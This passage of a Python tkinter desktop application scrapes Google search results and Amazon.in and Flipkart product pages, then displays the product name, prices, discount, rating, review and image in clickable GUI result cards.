super(initResultCardShopping,self).openWebsite(self.cardShoppingFrameElements[thumbName]['searchurl']))\n\n\t\tself.cardShoppingFrameElements[thumbName]['frameCaption'].\tgrid(row=0,column=gridCol*2,columnspan=2,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\tself.cardShoppingFrameElements[thumbName]['name'].\t\t\tgrid(row=1,column=gridCol*2,columnspan=2,sticky='NW',padx=3,pady=5,ipadx=0,ipady=0)\n\t\tif success:\n\t\t\tself.cardShoppingFrameElements[thumbName]['finalprice'].\tgrid(row=2,column=gridCol*2+1,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['discount'].\t\tgrid(row=3,column=gridCol*2+1,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['initialprice'].\tgrid(row=4,column=gridCol*2+1,sticky='NW',padx=0,pady=0,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['rating'].\t\tgrid(row=5,column=gridCol*2+1,sticky='NW',padx=0,pady=2,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['reviewphrase'].\tgrid(row=6,column=gridCol*2,columnspan=2,sticky='NW',padx=3,pady=2,ipadx=0,ipady=0)\n\t\t\tself.cardShoppingFrameElements[thumbName]['review'].\t\tgrid(row=7,column=gridCol*2,columnspan=2,sticky='NW',padx=3,pady=0,ipadx=0,ipady=0)\n\n\t\tif not success:\n\t\t\tself.cardShoppingFrameElements[thumbName]['image'] = ImageTk.PhotoImage(Image.open(\"images/product-not-found-280x280.png\"))\n\t\telif scrapeShoppingData['imageurl'] == '':\n\t\t\tself.cardShoppingFrameElements[thumbName]['image'] = ImageTk.PhotoImage(Image.open(\"images/image-not-available-280x280.png\"))\n\t\telse: \n\t\t\timgFetched = urlopen(scrapeShoppingData['imageurl'])\n\t\t\timgFetched = Image.open(imgFetched)\n\t\t\t[imgW, imgH] = imgFetched.size\n\t\t\tif (imgW >= imgH and imgW > self.imageSideLength):\n\t\t\t\timgWt = imgW\n\t\t\t\timgW = self.imageSideLength\n\t\t\t\timgH = (self.imageSideLength * imgH) // imgWt\n\t\t\telif (imgH > imgW and imgH > self.imageSideLength):\n\t\t\t\timgHt = imgH\n\t\t\t\timgH = self.imageSideLength\n\t\t\t\timgW = (self.imageSideLength * imgW) // imgHt\n\t\t\timgFetched = imgFetched.resize((imgW,imgH), Image.ANTIALIAS)\n\t\t\tself.cardShoppingFrameElements[thumbName]['image'] = ImageTk.PhotoImage(imgFetched)\n\t\tself.cardShoppingFrameElements[thumbName]['imageurl'] = 
ttk.Label(self,image=self.cardShoppingFrameElements[thumbName]['image'])\n\t\tself.cardShoppingFrameElements[thumbName]['imageurl'].grid(row=2,column=gridCol*2,rowspan=4,padx=10,pady=10,ipadx=0,ipady=0)\n\n\tdef printResultsShopping(self,dataset):\n\t\tprint(\"{\")\n\t\tfor i in dataset:\n\t\t\tprint(\"\\t\",i,\" : \",dataset[i])\n\t\tprint(\"}\")\n\n\tdef setScrapeShoppingFlipkartData(self,soupShoppingFlipkartProduct):\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._2_AcLJ\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tshoppingFlipkartProductProp = re.split(\"url\\(|\\?q=\",shoppingFlipkartProductProp.attrs[\"style\"])[1] + \"?q=100\"\n\t\t\tself.scrapeShoppingFlipkartData['imageurl'] = shoppingFlipkartProductProp.replace('/128',f'/{self.imageSideLength}',2)\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.p\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tshoppingFlipkartProductProp = shoppingFlipkartProductProp.text\n\t\t\tshoppingFlipkartProductProp = re.sub(\"\\n+\", \" \", shoppingFlipkartProductProp)\n\t\t\tself.scrapeShoppingFlipkartData['name'] = shoppingFlipkartProductProp\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._1iCvwn\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['discount'] = shoppingFlipkartProductProp.text[:-4]\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._3auQ3N\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['initialprice'] = shoppingFlipkartProductProp.text[1:]\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._1vC4OE._3qQ9m1\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['finalprice'] = shoppingFlipkartProductProp.text[1:]\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._1i0wk8\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['rating'] = shoppingFlipkartProductProp.text\n\t\telse:\n\t\t\tself.scrapeShoppingFlipkartData['rating'] = 'No Rating'\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\"._2xg6Ul\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tself.scrapeShoppingFlipkartData['reviewphrase'] = shoppingFlipkartProductProp.text.replace(\"&\",\"&\")\n\t\tshoppingFlipkartProductProp = soupShoppingFlipkartProduct.select_one(\".qwjRop div div\")\n\t\tif shoppingFlipkartProductProp != None:\n\t\t\tshoppingFlipkartProductProp = shoppingFlipkartProductProp.decode_contents()\n\t\t\tshoppingFlipkartProductProp = shoppingFlipkartProductProp.replace('\\\"',\"\").replace(\"&\",\"&\")\n\t\t\tshoppingFlipkartProductProp = re.sub(\"\\n+\", \" \", shoppingFlipkartProductProp)\n\t\t\tself.scrapeShoppingFlipkartData['review'] = re.sub(\"<.*>\",\" \",shoppingFlipkartProductProp)[:400]+\"...\"\n\t\tif(self.scrapeShoppingFlipkartData['reviewphrase']=='-' and self.scrapeShoppingFlipkartData['review']=='-'):\n\t\t\tself.scrapeShoppingFlipkartData['reviewphrase'] = 'No Review'\n\t\t\tself.scrapeShoppingFlipkartData['review'] = ''\n\n\tdef scrapeShoppingFlipkart(self):\n\t\tshoppingFlipkartSearchKeys = super().optimizeSearchInput(self.searchKeys)\n\t\tshoppingFlipkartSearchURL = f\"https://www.flipkart.com/search?q={shoppingFlipkartSearchKeys}&otracker=search&otracker1=search&sort=relevance\"\n\t\tsuper().progress(20)\n\t\tsoupShoppingFlipkart = 
super().getSoup(shoppingFlipkartSearchURL,40)\n\t\tsuper().progress(50)\n\t\tself.scrapeShoppingFlipkartData = {'name':\"-\",'initialprice':\"-\",'discount':\"-\",'finalprice':\"-\",'rating':\"-\",'reviewphrase':\"-\",'review':\"-\",'imageurl':\"\",'searchurl':shoppingFlipkartSearchURL}\n\n\t\twith open(\"flip.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\tfile.write(soupShoppingFlipkart.prettify())\n\n\t\tshoppingFlipkartNoResult = soupShoppingFlipkart.select_one(\".DUFPUZ\")\n\t\tif shoppingFlipkartNoResult != None:\n\t\t\tself.scrapeShoppingFlipkartData[\"name\"] = \"No product found :(\"\n\t\t\treturn 0\n\t\telse:\n\t\t\tshoppingFlipkartSearchURL = soupShoppingFlipkart.select_one(\"a[target=_blank]\").attrs['href']\n\t\t\tshoppingFlipkartSearchURL = f\"https://flipkart.com{shoppingFlipkartSearchURL}\"\n\t\t\tsoupShoppingFlipkartProduct = super().getSoup(shoppingFlipkartSearchURL)\n\n\t\t\tself.scrapeShoppingFlipkartData['searchurl']=shoppingFlipkartSearchURL\n\t\t\t# with open(\"amz.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\twith open(\"flp.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\t\tfile.write(soupShoppingFlipkartProduct.prettify())\n\n\t\t\tself.setScrapeShoppingFlipkartData(soupShoppingFlipkartProduct)\n\t\t\tself.printResultsShopping(self.scrapeShoppingFlipkartData)\n\t\t\treturn 1\n\n\tdef setScrapeShoppingAmazonData(self,soupShoppingAmazonProduct):\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".a-dynamic-image\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\t# self.scrapeShoppingAmazonData['imageurl'] = shoppingAmazonProductProp.attrs[\"data-old-hires\"]\n\t\t\tself.scrapeShoppingAmazonData['imageurl'] = shoppingAmazonProductProp.attrs[\"data-a-dynamic-image\"].split(\"\\\"\")[1]\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"#title\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tshoppingAmazonProductProp = shoppingAmazonProductProp.text.strip()\n\t\t\tself.scrapeShoppingAmazonData['name'] = re.sub(\"\\n+\", \" \", shoppingAmazonProductProp)\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".priceBlockSavingsString\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['discount'] = shoppingAmazonProductProp.text.strip()\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".priceBlockStrikePriceString\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['initialprice'] = shoppingAmazonProductProp.text.strip()[2:]\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"#priceblock_ourprice,#priceblock_saleprice,#priceblock_dealprice\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['finalprice'] = shoppingAmazonProductProp.text.strip()[2:]\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"i.averageStarRating\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['rating'] = shoppingAmazonProductProp.text.split(\" \")[0]\n\t\telse:\n\t\t\tself.scrapeShoppingAmazonData['rating'] = 'No rating'\n\t\tshoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\"a.a-text-bold span\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tself.scrapeShoppingAmazonData['reviewphrase'] = shoppingAmazonProductProp.text.replace(\"&\",\"&\")\n\t\t# shoppingAmazonProductProp = soupShoppingAmazonProduct.select_one(\".a-expander-partial-collapse-content span\")\n\t\tshoppingAmazonProductProp = 
soupShoppingAmazonProduct.select_one(\"#cm-cr-dp-review-list .a-expander-partial-collapse-content span\")\n\t\tif shoppingAmazonProductProp != None:\n\t\t\tshoppingAmazonProductProp = shoppingAmazonProductProp.decode_contents()\n\t\t\tshoppingAmazonProductProp = shoppingAmazonProductProp.replace('\\\"',\"\").replace(\"&\",\"&\")\n\t\t\tshoppingAmazonProductProp = re.sub(\"\\n+\", \" \", shoppingAmazonProductProp)\n\t\t\tself.scrapeShoppingAmazonData['review'] = re.sub(\"<.*>\",\" \",shoppingAmazonProductProp)[:400]+'...'\n\t\tif(self.scrapeShoppingAmazonData['reviewphrase']=='-' and self.scrapeShoppingAmazonData['review']=='-'):\n\t\t\tself.scrapeShoppingAmazonData['reviewphrase'] = 'No Review'\n\t\t\tself.scrapeShoppingAmazonData['review'] = ''\n\n\tdef scrapeShoppingAmazon(self):\n\t\tshoppingAmazonSearchKeys = super().optimizeSearchInput(self.searchKeys)\n\t\tshoppingAmazonSearchURL = f\"http://www.amazon.in/s/ref=nb_sb_noss_2?url=search-alias%3Daps&field-keywords={shoppingAmazonSearchKeys}\"\n\t\tsuper().progress(20)\n\t\tsoupShoppingAmazon = super().getSoup(shoppingAmazonSearchURL,40)\n\t\tsuper().progress(50)\n\t\tself.scrapeShoppingAmazonData = {'name':\"-\",'initialprice':\"-\",'discount':\"-\",'finalprice':\"-\",'rating':\"-\",'reviewphrase':\"-\",'review':\"-\",'imageurl':\"\",'searchurl':shoppingAmazonSearchURL}\n\n\t\twith open(\"amz(results).html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\tfile.write(soupShoppingAmazon.prettify())\n\n\t\tshoppingAmazonResult = soupShoppingAmazon.select(\".a-link-normal.a-text-normal\")\n\t\tif shoppingAmazonResult == []:\n\t\t\tself.scrapeShoppingAmazonData[\"name\"] = \"No product found :(\"\n\t\t\tprint(\"1st return\",self.scrapeShoppingAmazonData)\t\n\t\t\treturn 0\n\n\t\telse:\n\t\t\tfor anchor in shoppingAmazonResult:\n\t\t\t\tanchorHref = anchor.attrs[\"href\"]\n\t\t\t\tif \"ssoredirect\" not in anchorHref:\n\t\t\t\t\tanchorHref = anchorHref.replace(\"%3D\",\"=\")\n\t\t\t\t\tanchorHref = anchorHref.replace(\"%26\",\"&\")\n\t\t\t\t\tanchorHref = anchorHref.replace(\"%3\"+\"F\",\"?\")\n\t\t\t\t\tshoppingAmazonSearchURL = f\"http://www.amazon.in/{anchorHref}\"\n\t\t\t\t\tbreak\n\n\t\t\tif \"http://www.amazon.in/s/ref=nb_sb_noss_2?url=search-alias%3Daps&field-keywords=\" in shoppingAmazonSearchURL:\n\t\t\t\tself.scrapeShoppingAmazonData[\"name\"] = \"No product found :(\"\n\t\t\t\tprint(\"2nd return\", self.scrapeShoppingAmazonData)\t\n\t\t\t\treturn 0\n\n\t\t\tsoupShoppingAmazonProduct = super().getSoup(shoppingAmazonSearchURL)\n\t\t\tself.scrapeShoppingAmazonData['searchurl']=shoppingAmazonSearchURL\n\t\t\twith open(\"amz.html\",\"w\",encoding=\"utf-8\") as file:\n\t\t\t\tfile.write(soupShoppingAmazonProduct.prettify())\n\t\t\tself.setScrapeShoppingAmazonData(soupShoppingAmazonProduct)\n\t\t\tself.printResultsShopping(self.scrapeShoppingAmazonData)\n\t\t\treturn 1\n\n\tdef initCardShoppingStyles(self):\n\t\tttk.Style().configure(\"linkShopping.TLabel\",foreground=\"#001b85\",background=\"#00e6b0\")\n\t\tttk.Style().configure(\"linkShoppingActive.TLabel\",foreground=\"#008cff\",background=\"#00e6b0\")\n\t\tttk.Style().configure(\"frameShopping.TFrame\",background=\"#00e6b0\")\n\t\tttk.Style().configure(\"textShopping.TLabel\",background=\"#00e6b0\")\n\t\n\tdef __init__(self,master=None,searchKeys=\"\"):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.searchKeys = searchKeys\n\t\tself.imageSideLength = 280\n\t\tself.cardShoppingFrameElements = {}\n\t\tself.initCardShoppingStyles()\n\t\tif 
master.master.master.tabMiddlePane.amazonToggleButtonState:\n\t\t\tsuper().progress(10)\n\t\t\tsuccessShoppingAmazon = self.scrapeShoppingAmazon()\n\t\t\tself.resultCardShoppingLoadWidgets(self.scrapeShoppingAmazonData,'amazon',0,successShoppingAmazon)\n\t\tif master.master.master.tabMiddlePane.flipkartToggleButtonState:\n\t\t\tsuper().progress(10)\n\t\t\tsuccessShoppingFlipkart = self.scrapeShoppingFlipkart()\n\t\t\tself.resultCardShoppingLoadWidgets(self.scrapeShoppingFlipkartData,'flipkart',1,successShoppingFlipkart)\n\t\t\n\t\tself.pack(side=\"bottom\",ipadx=0,ipady=5,padx=0,pady=5,expand=1,fill=\"x\")\n\t\tself.config(relief=\"sunken\",style=\"frameShopping.TFrame\")\n\t\tsuper().progress(100)\n\nclass initResultCardGoogle(ttk.Frame,basicProcesses):\n\tdef cardGoogleHoverIn(self,event):\n\t\tself.config(style=\"cardResultFrameActive.TFrame\")\n\t\tself.cardGoogleTitle.config(style=\"titleFrameActive.TLabel\")\n\t\tself.cardGoogleLink.config(style=\"linkFrameActive.TLabel\")\n\t\tself.cardGoogleText.config(style=\"textFrameActive.TLabel\")\n\t\tif self.success:\n\t\t\tself.cardGoogleFooter.config(style=\"linkFrameActive.TLabel\")\n\t\n\tdef cardGoogleHoverOut(self,event):\n\t\tself.config(style=\"cardResultFrame.TFrame\")\n\t\tself.cardGoogleTitle.config(style=\"titleFrame.TLabel\")\n\t\tself.cardGoogleLink.config(style=\"linkFrame.TLabel\")\n\t\tself.cardGoogleText.config(style=\"textFrame.TLabel\")\n\t\tif self.success:\n\t\t\tself.cardGoogleFooter.config(style=\"linkFrame.TLabel\")\n\n\tdef resultCardGoogleLoadWidgets(self):\n\t\tprint(self.scrapeGoogleData)\n\t\tself.cardGoogleTitle = ttk.Label(self,text=self.scrapeGoogleData[\"title\"],justify=\"left\",font=(\"Calibri\",15),wrap=1300,style=\"titleFrame.TLabel\")\n\t\tself.cardGoogleLink = ttk.Label(self,text=self.scrapeGoogleData[\"link\"],justify=\"left\",font=(\"Calibri\",12,'underline'),wrap=1300,style=\"linkFrameActive.TLabel\")\n\t\tself.cardGoogleText = ttk.Label(self,text=self.scrapeGoogleData[\"text\"],justify=\"left\",font=(\"Calibri\",13),wrap=1300,style=\"textFrameActive.TLabel\")\n\t\tself.cardGoogleFooter = ttk.Label(self,text=f\"Google search results for {self.searchKeys}\",justify=\"left\",font=(\"Calibri\",13),wrap=1300,style=\"linkFrameActive.TLabel\")\n\t\t\n\t\tself.cardGoogleTitle.grid(row=0,column=0,sticky='W',padx=20)\n\t\tself.cardGoogleLink.grid(row=1,column=0,sticky='W',padx=20,pady=3)\n\t\tself.cardGoogleText.grid(row=2,column=0,sticky='W',padx=20,pady=3)\n\t\tself.cardGoogleFooter.grid(row=3,column=0,sticky='W',padx=20,pady=3)\n\t\tself.cardGoogleLink.bind(\"<Enter>\", lambda event : event.widget.config(style=\"linkActive.TLabel\"))\n\t\tself.cardGoogleLink.bind(\"<Leave>\", lambda event : event.widget.config(style=\"linkFrameActive.TLabel\"))\n\t\tself.cardGoogleLink.bind(\"<Button-1>\", lambda t : super(initResultCardGoogle,self).openWebsite(self.scrapeGoogleData[\"link\"]))\n\t\tself.cardGoogleFooter.bind(\"<Enter>\", lambda event : event.widget.config(style=\"linkActive.TLabel\"))\n\t\tself.cardGoogleFooter.bind(\"<Leave>\", lambda event : event.widget.config(style=\"linkFrameActive.TLabel\"))\n\t\tself.cardGoogleFooter.bind(\"<Button-1>\", lambda t : super(initResultCardGoogle,self).openWebsite(self.googleSearchURL))\n\n\tdef 
initCardGoogleStyles(self):\n\t\tttk.Style().configure(\"cardResultFrame.TFrame\",background=\"#00e6c7\",bordercolor=\"blue\",borderwidth=2)\n\t\tttk.Style().configure(\"cardResultFrameActive.TFrame\",background=\"#00e6b0\",bordercolor=\"blue\",borderwidth=2)\n\n\t\tttk.Style().configure(\"titleFrame.TLabel\",foreground=\"#ffffff\",background=\"#d40000\")\n\t\tttk.Style().configure(\"titleFrameActive.TLabel\",foreground=\"#ffffff\",background=\"#b50000\")\n\t\t\n\t\tttk.Style().configure(\"linkFrame.TLabel\",foreground=\"#001b85\",background=\"#00e6c7\",relief='flat')\n\t\tttk.Style().configure(\"linkFrameActive.TLabel\",foreground=\"#001b85\",background=\"#00e6b0\",relief='flat')\n\t\tttk.Style().configure(\"linkActive.TLabel\",foreground=\"#008cff\",background=\"#00e6b0\",relief='flat')\n\t\t#1fffca\n\t\tttk.Style().configure(\"textFrame.TLabel\",foreground=\"black\",background=\"#00e6c7\")\n\t\tttk.Style().configure(\"textFrameActive.TLabel\",foreground=\"black\",background=\"#00e6b0\")\n\n\tdef scrapeGoogle(self):\n\t\tgoogleSearchKeys = super().optimizeSearchInput(self.searchKeys)\n\t\tself.googleSearchURL = f\"https://www.google.com/search?q={googleSearchKeys}&num=10&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=fflb\"\n\t\tsuper().progress(20)\n\t\tsoupGoogle = super().getSoup(self.googleSearchURL)\n\t\tsuper().progress(80)\n\t\tself.scrapeGoogleData = {'link':\"-\",'title':\"-\",'text':\"-\"}\n\n\t\ttopResult = soupGoogle.select_one(\".PhiYYd.QBl4oe\")\n\t\tif topResult!=None:\n\t\t\tself.scrapeGoogleData['link'] = topResult.select_one(\"a\").attrs['href']\n\t\t\tself.scrapeGoogleData['title'] = topResult.select_one(\"h3\").text\n\t\t\tself.scrapeGoogleData['text'] = \"Preview Image\"\n\t\telse:\n\t\t\ttopResult = soupGoogle.select_one(\".rc\")\n\t\t\tif topResult!=None:\n\t\t\t\tself.scrapeGoogleData['link'] = topResult.select_one(\"a\").attrs['href']\n\t\t\t\tself.scrapeGoogleData['title'] = topResult.select_one(\"h3\").text\n\t\t\t\tself.scrapeGoogleData['text'] = topResult.select_one(\".s\").text\n\t\t\t\tif self.scrapeGoogleData['text']==\"\":\n\t\t\t\t\tself.scrapeGoogleData['text'] = topResult.parent.previous_sibling.text\n\t\t\telse:\n\t\t\t\tself.scrapeGoogleData['title'] = \"Sorry! 
No results found :(\"\n\t\t\t\tself.scrapeGoogleData['link'] = self.googleSearchURL\n\t\t\t\tself.scrapeGoogleData['text'] = f\"You searched for - {self.searchKeys}\"\n\t\t\t\treturn 0\n\t\treturn 1\n\n\t\tprint(self.scrapeGoogleData)\n\n\tdef __init__(self,master=None,searchKeys=\"\"):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.searchKeys = searchKeys\n\t\tsuper().progress(10)\n\t\tself.success = self.scrapeGoogle()\n\t\tself.initCardGoogleStyles()\n\t\tself.resultCardGoogleLoadWidgets()\n\t\tsuper().progress(90)\n\t\tself.pack(side=\"bottom\",ipadx=0,ipady=5,padx=0,pady=5,expand=1,fill=\"x\")\n\t\tself.config(relief=\"sunken\",style=\"cardResultFrameActive.TFrame\")\n\t\tself.bind(\"\", self.cardGoogleHoverIn)\n\t\tself.bind(\"\", self.cardGoogleHoverOut)\n\t\tself.bind(\"\", lambda event : super(initResultCardGoogle,self).openWebsite(self.scrapeGoogleData[\"link\"]))\n\t\tsuper().progress(100)\n\nclass initTabLowerOutput(ttk.Frame):\n\tdef removeResultCard(self):\n\t\tif self.tabResultCardNumber > self.master.master.cardNumberMax:\n\t\t\tself.tabResultCards[self.tabResultCardNumber-self.master.master.cardNumberMax-1].destroy()\n\n\tdef createResultCard(self,cardType,searchKeys):\n\t\tself.tabResultCards[self.tabResultCardNumber] = cardType(self,searchKeys)\n\t\tself.tabResultCardNumber+=1\n\t\tself.removeResultCard()\n\n\tdef lowerOutputLoadWidgets(self):\n\t\tself.tabResultsPlaceholder = ttk.Label(self,text=\"\",font=(\"Calibri\",10),justify=\"center\",width=200)\n\t\tself.tabResultsPlaceholder.pack(side=\"bottom\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\tself.tabResultCardNumber = 0\n\t\tself.tabResultCards = {}\n\n\tdef __init__(self,master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.grid(row=0,column=1,sticky=\"N\",ipadx=0,ipady=0,padx=15,pady=0)\n\t\t# self.lowerOutputStyle = ttk.Style()\n\t\t# self.lowerOutputStyle.configure(\"Output.TFrame\",background=\"blue\")\n\t\t# self.config(style=\"Output.TFrame\")\n\t\tself.lowerOutputLoadWidgets()\n\nclass initTabLowerPane(ttk.Frame):\n\tdef lowerPaneLoadWidgets(self):\n\t\tself.tabLowerProgress = ttk.Progressbar(self,length=540,value=0,orient=\"vertical\")\n\t\tself.tabLowerProgress.grid(row=0,column=0,ipadx=1,ipady=0,padx=0,pady=0)\n\t\tself.tabLowerOutput = initTabLowerOutput(self)\n\t\n\tdef __init__(self,master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\t# self.lowerPaneStyle = ttk.Style()\n\t\t# self.lowerPaneStyle.configure(\"Lower.TFrame\",background=\"red\")\n\t\t# self.config(style=\"Lower.TFrame\")\n\t\tself.lowerPaneLoadWidgets()\n\nclass initTabMiddlePane (ttk.Frame):\n\tdef amazonToggle(self,event):\n\t\tself.amazonToggleButtonState = not self.amazonToggleButtonState\n\t\tif self.amazonToggleButtonState:\n\t\t\tself.amazonToggleButton.config(image=self.amazonEnabled)\n\t\telse:\n\t\t\tself.amazonToggleButton.config(image=self.amazonDisabled)\n\t\tif (not self.amazonToggleButtonState and not self.flipkartToggleButtonState):\n\t\t\tself.flipkartToggle(\"Toggle\")\n\n\tdef flipkartToggle(self,event):\n\t\tself.flipkartToggleButtonState = not self.flipkartToggleButtonState\n\t\tif self.flipkartToggleButtonState:\n\t\t\tself.flipkartToggleButton.config(image=self.flipkartEnabled)\n\t\telse:\n\t\t\tself.flipkartToggleButton.config(image=self.flipkartDisabled)\n\t\tif (not self.flipkartToggleButtonState and not self.amazonToggleButtonState):\n\t\t\tself.amazonToggle(\"Toggle\")\n\n\tdef 
middlePaneLoadWidgets(self,tabName):\n\t\tif tabName == \"Google Search\":\n\t\t\tself.middlePaneTagImage = ImageTk.PhotoImage(Image.open(\"images/google-middle-pane-600x50.png\"))\n\t\t\tself.middlePaneTagLabel = ttk.Label(self,image=self.middlePaneTagImage)\n\t\t\tself.middlePaneTagLabel.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\telif tabName == \"Online Shopping\":\n\t\t\tself.amazonEnabled = ImageTk.PhotoImage(Image.open(\"images/amazon-enabled.png\"))\n\t\t\tself.amazonDisabled = ImageTk.PhotoImage(Image.open(\"images/amazon-disabled.png\"))\n\t\t\tself.flipkartEnabled = ImageTk.PhotoImage(Image.open(\"images/flipkart-enabled.png\"))\n\t\t\tself.flipkartDisabled = ImageTk.PhotoImage(Image.open(\"images/flipkart-disabled.png\"))\n\n\t\t\tself.amazonToggleButtonState = True\n\t\t\tself.flipkartToggleButtonState = True\n\t\t\tself.amazonToggleButton = ttk.Label(self,image=self.amazonEnabled,style=\"TLabel\")\n\t\t\tself.flipkartToggleButton = ttk.Label(self,image=self.flipkartEnabled,style=\"TLabel\")\n\n\t\t\tself.amazonToggleButton.bind(\"<Button-1>\",self.amazonToggle)\n\t\t\tself.flipkartToggleButton.bind(\"<Button-1>\",self.flipkartToggle)\n\n\t\t\tself.amazonToggleButton.pack(side='left')\n\t\t\tself.flipkartToggleButton.pack(side='left')\n\t\t\n\tdef __init__(self,master=None,tabName=\"Tab\"):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=10)\n\t\tself.middlePaneLoadWidgets(tabName)\n\nclass initTabInputPane(ttk.Frame):\n\tdef clearInputFieldFirst(self,event):\n\t\tif self.clearInputField :\n\t\t\tself.tabInputField.delete(0,'end')\n\t\t\tself.clearInputField = 0\n\n\tdef inputPaneLoadWidgets(self):\n\n\t\tself.entryStyle = ttk.Style()\n\t\tself.entryStyle.map(\"Custom.TEntry\",foreground=[('!focus', 'grey')])\n\t\tself.tabInputField = ttk.Entry(self,width=80,font=(\"Calibri\",15),style=\"Custom.TEntry\")\n\t\tself.tabInputField.insert(0,\"Enter your search term here\")\n\t\tself.tabSearchIconImage = ImageTk.PhotoImage(Image.open(\"images/search-icon-image-disabled-80x80.png\"))\n\t\tself.tabSearchIcon = ttk.Button(self,image=self.tabSearchIconImage,style=\"searchIcon.TLabel\",command=lambda:self.master.processInput(\"SearchButton\"))\n\n\t\tself.clearInputField = 1\n\t\tself.tabInputField.pack(side=\"left\",padx=40,pady=0,ipadx=0,ipady=8)\n\t\tself.tabInputField.bind(\"<Button-1>\",self.clearInputFieldFirst)\n\t\tself.tabInputField.bind(\"<Return>\",self.master.processInput)\n\t\tself.tabSearchIcon.pack(side=\"left\",padx=40,pady=0,ipadx=0,ipady=10)\n\n\tdef __init__(self,master=None):\n\t\tsuper().__init__(master)\n\t\tself.master = master\n\t\tself.pack(side=\"top\",ipadx=0,ipady=0,padx=10,pady=0)\n\t\tself.inputPaneLoadWidgets()\n\nclass initRootNbTab (ttk.Frame):\n\tdef processInput(self,event):\n\t\tif self.processingInput:\n\t\t\treturn\n\t\tself.processingInput = True\n\t\tself.tabInputPane.tabInputField.config(state='disabled')\n\t\tself.tabInputPane.tabSearchIcon.config(state='disabled')\n\t\tself.tabLowerPane.tabLowerProgress.update_idletasks()\n\n\t\tif self.tabName == \"Google Search\":\n\t\t\tself.tabLowerPane.tabLowerOutput.createResultCard(initResultCardGoogle,self.tabInputPane.tabInputField.get())\n\t\telif self.tabName == \"Online 
Shopping\":\n\t\t\tself.tabLowerPane.tabLowerOutput.createResultCard(initResultCardShopping,self.tabInputPane.tabInputField.get())\n\n\t\tself.tabInputPane.tabInputField.config(state='normal')\n\t\tself.tabInputPane.tabSearchIcon.config(state='normal')\n\t\tself.tabInputPane.update_idletasks()\n\t\tself.processingInput = False\n\n\tdef tabLoadWidgets(self):\n\t\tself.tabImage = ImageTk.PhotoImage(Image.open(f\"images/{self.tabName.replace(' ','-')}-tab-image-1200x220.png\"))\n\t\tself.tabImageLabel = ttk.Label(self,image=self.tabImage)\n\t\tself.tabImageLabel.pack(side=\"top\",ipadx=0,ipady=0,padx=0,pady=0)\n\t\tself.searchKeys = None\n\t\tself.tabInputPane = initTabInputPane(self)\n\t\tself.tabMiddlePane = initTabMiddlePane(self,self.tabName)\n\t\tself.tabLowerPane = initTabLowerPane(self)\n\t\tself.processingInput = False\n\n\tdef __init__(self,master=None,tabName=\"Tab\",cardNumberMax=1):\n\t\tsuper().__init__()\n\t\tself.master = master\n\t\tself.master.add(self,text=tabName)\n\t\tself.tabName = tabName\n\t\tself.cardNumberMax = cardNumberMax\n\t\tself.tabLoadWidgets()\n\nclass initRootNotebook(ttk.Notebook):\n\tdef notebookLoadWidgets(self):\n\t\tself.rootTabGoogle = initRootNbTab(self,\"Google Search\",3)\n\t\tself.rootTabShopping = initRootNbTab(self,\"Online Shopping\")\n\n\tdef __init__(self,master):\n\t\tsuper().__init__()\n\t\tself.master = master\n\t\tself.pack(expand=1,fill=\"both\")\n\t\tself.enable_traversal()\n\t\tself.notebookLoadWidgets()\n\nclass 